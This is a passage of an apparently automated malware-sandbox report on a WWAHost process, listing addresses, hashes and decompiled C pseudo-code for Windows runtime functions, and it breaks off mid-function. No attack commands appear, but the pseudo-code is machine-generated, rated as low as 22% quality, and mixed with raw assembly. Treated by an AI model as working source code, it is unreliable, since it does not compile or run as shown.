                                              0x039cc0d1
                                              0x039cc0e0
                                              0x039cc0e5
                                              0x039cc0e5
                                              0x039cc0e8
                                              0x00000000
                                              0x039cc0e8
                                              0x0398fdf4
                                              0x00000000
                                              0x00000000
                                              0x0398fdf6
                                              0x0398fdfa
                                              0x0398fe1a
                                              0x0398fe1f
                                              0x0398fe1f
                                              0x0398fdfc
                                              0x00000000
                                              0x0398fdfc
                                              0x0398fdcc
                                              0x0398fdd0
                                              0x0398fe26
                                              0x00000000
                                              0x0398fe26
                                              0x0398fdd8
                                              0x0398fddb
                                              0x0398fddd
                                              0x0398fde0
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                              • Instruction ID: 01b3a6e1637f94f7459e4447bc55a6a80804d25dbc0dff8fa924a1ebafcef680
                                              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                              • Instruction Fuzzy Hash: BC217C72600640DBCB31EF49E540A66F7E9EBD4B50F2985AEE94A8B611D730AC01CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398B390 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E0398B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E03972280(_t12, 0x3a48608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E039900C2(0x3a48608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                              0x0398b395
                                              0x0398b3a2
                                              0x0398b3a5
                                              0x0398b3aa
                                              0x0398b3b2
                                              0x0398b3ba
                                              0x0398b3bd
                                              0x0398b3c0
                                              0x0398b3c4
                                              0x0398b3c9
                                              0x039ca3e9
                                              0x039ca3ed
                                              0x039ca3f0
                                              0x039ca3ff
                                              0x039ca403
                                              0x039ca409
                                              0x00000000
                                              0x00000000
                                              0x039ca40b
                                              0x039ca40b
                                              0x039ca40f
                                              0x039ca415
                                              0x039ca423
                                              0x039ca423
                                              0x039ca415
                                              0x0398b3d1
                                              0x0398b3e8
                                              0x0398b3e8
                                              0x0398b3d9

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1e30bfd382d2decfb25499fbc5242def2727dee26a7d5f036cecd44cf00cd98
                                              • Instruction ID: fe73fb4cac61e6028cc89609eeb871bbe76324fb10071d4c07715239ebb9ae43
                                              • Opcode Fuzzy Hash: f1e30bfd382d2decfb25499fbc5242def2727dee26a7d5f036cecd44cf00cd98
                                              • Instruction Fuzzy Hash: 7F116F373111145BCB18DB549D4166BB25EEBC5370B2D012EDD16CB380CA369C02C695
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03959240 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E03959240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x3a2f708);
				E039AD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E039995D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E039995D0();
				_t33 =  *0x3a484c4; // 0x0
				L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x3a484c4; // 0x0
				L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x3a484c4; // 0x0
				E03972280(L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x3a486b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E039995D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E039995D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E03959325();
					_t50 =  *0x3a484c4; // 0x0
					return E039AD0D1(L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                              0x03959240
                                              0x03959242
                                              0x03959247
                                              0x0395924c
                                              0x0395924e
                                              0x03959255
                                              0x03959257
                                              0x0395925a
                                              0x0395925f
                                              0x0395925f
                                              0x03959266
                                              0x03959271
                                              0x03959276
                                              0x03959279
                                              0x0395927e
                                              0x03959295
                                              0x0395929a
                                              0x039592b1
                                              0x039592b6
                                              0x039592d7
                                              0x039592dc
                                              0x039592e0
                                              0x039592e6
                                              0x039592e8
                                              0x039592ee
                                              0x03959332
                                              0x03959333
                                              0x03959337
                                              0x03959338
                                              0x0395933a
                                              0x0395933a
                                              0x0395933d
                                              0x03959342
                                              0x03959342
                                              0x03959345
                                              0x03959349
                                              0x0395934e
                                              0x03959352
                                              0x03959357
                                              0x039592f4
                                              0x039592f4
                                              0x039592f6
                                              0x039592f9
                                              0x03959300
                                              0x03959306
                                              0x03959324
                                              0x03959324

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 85d673551b27180cc8e757db0ca1ea54ada6059bfae752dbc6cfd7f6f4794fe6
                                              • Instruction ID: 168ef9d4d74ec2cef518456adcf394fc58c86782076eeab064ac8a73a798a2d7
                                              • Opcode Fuzzy Hash: 85d673551b27180cc8e757db0ca1ea54ada6059bfae752dbc6cfd7f6f4794fe6
                                              • Instruction Fuzzy Hash: 96216A35051B00DFC721EF68DA00F5AB7F9FF58704F0545A8E0498B6A2CB39E982CB44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039E4257 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E039E4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x3a308d0);
				E039AD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E039E41E8(__ebx, __edi, __ecx, _t39);
				E0396EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x3a487e4;
					_t18 =  *0x3a487e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x3a45cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x3a487e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x3a487e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L03957055(_t31 + 0xfffffff8);
								_t24 =  *0x3a487e0; // 0x0
								_t18 = _t24 - 1;
								 *0x3a487e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x3a45cd0;
				if( *0x3a45cd0 <= 0) {
					L03957055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x3a487e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x3a487e8 = _t30;
						 *0x3a487e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E039AD0D1(L039E4320());
			}















                                              0x039e4257
                                              0x039e4257
                                              0x039e4257
                                              0x039e4259
                                              0x039e425e
                                              0x039e4263
                                              0x039e4265
                                              0x039e4273
                                              0x039e4278
                                              0x039e427c
                                              0x039e427f
                                              0x039e4281
                                              0x039e4287
                                              0x039e42d7
                                              0x039e42d7
                                              0x039e42da
                                              0x039e428d
                                              0x039e428d
                                              0x039e428f
                                              0x039e4292
                                              0x039e4297
                                              0x039e429c
                                              0x039e42a0
                                              0x039e42a6
                                              0x039e42a8
                                              0x039e42ae
                                              0x039e42b3
                                              0x00000000
                                              0x039e42ba
                                              0x039e42ba
                                              0x039e42bf
                                              0x039e42c5
                                              0x039e42ca
                                              0x039e42cf
                                              0x039e42d0
                                              0x00000000
                                              0x039e42d0
                                              0x039e42b3
                                              0x00000000
                                              0x039e42a6
                                              0x039e429c
                                              0x039e42dc
                                              0x039e42dc
                                              0x039e42e3
                                              0x039e4309
                                              0x039e42e5
                                              0x039e42e5
                                              0x039e42e8
                                              0x039e42ee
                                              0x039e42f0
                                              0x00000000
                                              0x039e42f2
                                              0x039e42f2
                                              0x039e42f4
                                              0x039e42f7
                                              0x039e42f9
                                              0x039e4300
                                              0x039e4300
                                              0x039e42f0
                                              0x039e430e
                                              0x039e431f

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89e4a496881a91e0782b5899a3c878f41103c06825a276e6b4e1f7722ff48e8f
                                              • Instruction ID: 3cbea29b2382370e69bfec4c3d82a391c80f0f61a18ca21856862545c4019fec
                                              • Opcode Fuzzy Hash: 89e4a496881a91e0782b5899a3c878f41103c06825a276e6b4e1f7722ff48e8f
                                              • Instruction Fuzzy Hash: 3A219D78902700CFCB56EF6AE610628B7F8FBC6354B5482AEC1058F754D73AC482CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03982397 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 22%
                                              			E03982397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x3a4848c != 0) {
					L0397FAD0(0x3a48610);
					if( *0x3a4848c == 0) {
						E0397FA00(0x3a48610, _t19, _t27, 0x3a48610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E03982581(0x3a48610, 0x39350a0, _t26, _t27, _t28);
						E0397FA00(0x3a48610, 0x39350a0, _t27, 0x3a48610);
					}
				} else {
					L1:
					_t11 =  *0x3a48614; // 0x1
					if(_t11 == 0) {
						_t11 = E03994886(0x3931088, 1, 0x3a48614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E03982581(0x3a48610, (_t11 << 4) + 0x3935070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                              0x039823b0
                                              0x039823b6
                                              0x03982409
                                              0x03982415
                                              0x039c5ae9
                                              0x00000000
                                              0x0398241b
                                              0x0398241b
                                              0x0398241d
                                              0x03982427
                                              0x0398242e
                                              0x03982430
                                              0x03982430
                                              0x039823b8
                                              0x039823b8
                                              0x039823b8
                                              0x039823bf
                                              0x039823fc
                                              0x039823fc
                                              0x039823c1
                                              0x039823c3
                                              0x039823d0
                                              0x039823d8
                                              0x039823d8
                                              0x039823dc
                                              0x039823de
                                              0x039823e1
                                              0x039823e1
                                              0x039823ec

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c74390105a7f8f94780ae85cc9fe6c85b0208ca0b6a0b79fc79b4f4428028b17
                                              • Instruction ID: 8fd28ae523f9d1d46522cadda2e92c8086b286918e0ff9d47e454faa5c037dbc
                                              • Opcode Fuzzy Hash: c74390105a7f8f94780ae85cc9fe6c85b0208ca0b6a0b79fc79b4f4428028b17
                                              • Instruction Fuzzy Hash: FC112B7664034467E724FB2AAC90B15F2CCEBD0B50F184827F546AB290D7B9E8018754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039D46A7 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E039D46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0399F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0398D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L039777F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                              0x039d46b7
                                              0x039d46ba
                                              0x039d46c5
                                              0x039d46c8
                                              0x039d46d0
                                              0x039d46d4
                                              0x039d46e6
                                              0x039d46e9
                                              0x039d46f4
                                              0x039d46ff
                                              0x039d4705
                                              0x039d4706
                                              0x039d470c
                                              0x039d4713
                                              0x039d471b
                                              0x039d4723
                                              0x039d4725
                                              0x039d46d6
                                              0x039d46d9
                                              0x039d46db
                                              0x039d46db
                                              0x039d4732

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                              • Instruction ID: e3528161067cff917f3c7ce41751e40b046ed84defec9541f397c090518da8e6
                                              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                              • Instruction Fuzzy Hash: 2F110276504208BBCB01EF5D98808BEB7B9EFD5300F1080AAF944CB350DA318D51C3A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0395C962 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 42%
                                              			E0395C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x3a4d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0396EEF0(0x3a470a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E039DF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0396EB70(_t29, 0x3a470a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0399B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E039DF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x3a470c0; // 0x0
					while(_t38 != 0x3a470c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x3a4b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                              0x0395c96a
                                              0x0395c974
                                              0x0395c988
                                              0x0395c98a
                                              0x039c7c9d
                                              0x039c7c9f
                                              0x039c7ca4
                                              0x039c7cae
                                              0x039c7cf0
                                              0x039c7cf5
                                              0x039c7cfa
                                              0x0395c992
                                              0x0395c996
                                              0x0395c997
                                              0x0395c998
                                              0x0395c9a3
                                              0x0395c9a3
                                              0x039c7cb0
                                              0x039c7cb7
                                              0x039c7cbb
                                              0x00000000
                                              0x00000000
                                              0x039c7cbd
                                              0x039c7ce8
                                              0x039c7cc5
                                              0x039c7cc8
                                              0x039c7cca
                                              0x039c7cd0
                                              0x039c7cd6
                                              0x039c7cde
                                              0x039c7ce4
                                              0x039c7ce4
                                              0x039c7cd0
                                              0x00000000
                                              0x039c7ce8
                                              0x0395c990
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01b52d473732615416f21177bc0248bc2961134fa8f4b5a0c7026568a366213b
                                              • Instruction ID: d09581e01acdc3122bc81ee8b8442691c7a66b2fef576720a31d2081f127bbe7
                                              • Opcode Fuzzy Hash: 01b52d473732615416f21177bc0248bc2961134fa8f4b5a0c7026568a366213b
                                              • Instruction Fuzzy Hash: F411CE367107869FCB10EF69D885A2BB7A9FBC8650B04092DE85287651EB31EC10CBD2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039937F5 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 87%
                                              			E039937F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E03972280(_t6, 0x3a48550);
				}
				_t29 = E0399387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0396FFB0(0x3a48550, _t27, 0x3a48550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                              0x039937fa
                                              0x039937fc
                                              0x03993805
                                              0x03993808
                                              0x03993808
                                              0x03993814
                                              0x03993818
                                              0x03993846
                                              0x03993848
                                              0x0399384b
                                              0x0399384b
                                              0x03993852
                                              0x00000000
                                              0x03993854
                                              0x03993856
                                              0x00000000
                                              0x00000000
                                              0x03993863
                                              0x00000000
                                              0x03993863
                                              0x0399381a
                                              0x0399381a
                                              0x0399381f
                                              0x0399386e
                                              0x0399386e
                                              0x03993871
                                              0x03993873
                                              0x03993873
                                              0x03993868
                                              0x00000000
                                              0x03993868
                                              0x03993821
                                              0x03993826
                                              0x00000000
                                              0x00000000
                                              0x03993828
                                              0x0399382a
                                              0x03993841
                                              0x00000000
                                              0x03993841

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 111cc70a6c47e7dbf7f542c99b52b3d6e11fd7738b382a904e16863f10b11fa8
                                              • Instruction ID: aa7ebfe14315d191fd0984d845a9c9065e0b0d106a2f62e87f20a6fc2b17f87e
                                              • Opcode Fuzzy Hash: 111cc70a6c47e7dbf7f542c99b52b3d6e11fd7738b382a904e16863f10b11fa8
                                              • Instruction Fuzzy Hash: FF01C4BA9016109BDB27DF1F9980A26BBAEDFC5B9071984EBE8468B614D730C801C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398002D Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0398002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E03977D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E03977D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E03977D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E03977D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                              0x03980032
                                              0x03980037
                                              0x03980043
                                              0x039c4b3a
                                              0x03980049
                                              0x03980049
                                              0x03980049
                                              0x0398004e
                                              0x03980053
                                              0x039c4b48
                                              0x039c4b5a
                                              0x039c4b4a
                                              0x039c4b53
                                              0x039c4b53
                                              0x039c4b5f
                                              0x00000000
                                              0x039c4b61
                                              0x00000000
                                              0x039c4b61
                                              0x03980059
                                              0x03980059
                                              0x03980060
                                              0x039c4b6f
                                              0x039c4b6f
                                              0x03980069
                                              0x039c4b83
                                              0x00000000
                                              0x00000000
                                              0x039c4b90
                                              0x039c4b9b
                                              0x039c4b9b
                                              0x039c4ba4
                                              0x00000000
                                              0x00000000
                                              0x039c4baa
                                              0x00000000
                                              0x0398006f
                                              0x0398006f
                                              0x00000000
                                              0x0398006f
                                              0x03980069

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                              • Instruction ID: 5b60dec065ee36bf4d5641720327669b976cedccdc6a6a8940365fc75266d938
                                              • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                              • Instruction Fuzzy Hash: 2711ED327127C29FD723EB6AC964B3977DCAB80794F0D00E4DD148B7A2E728D841C262
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0396766D Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E0396766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

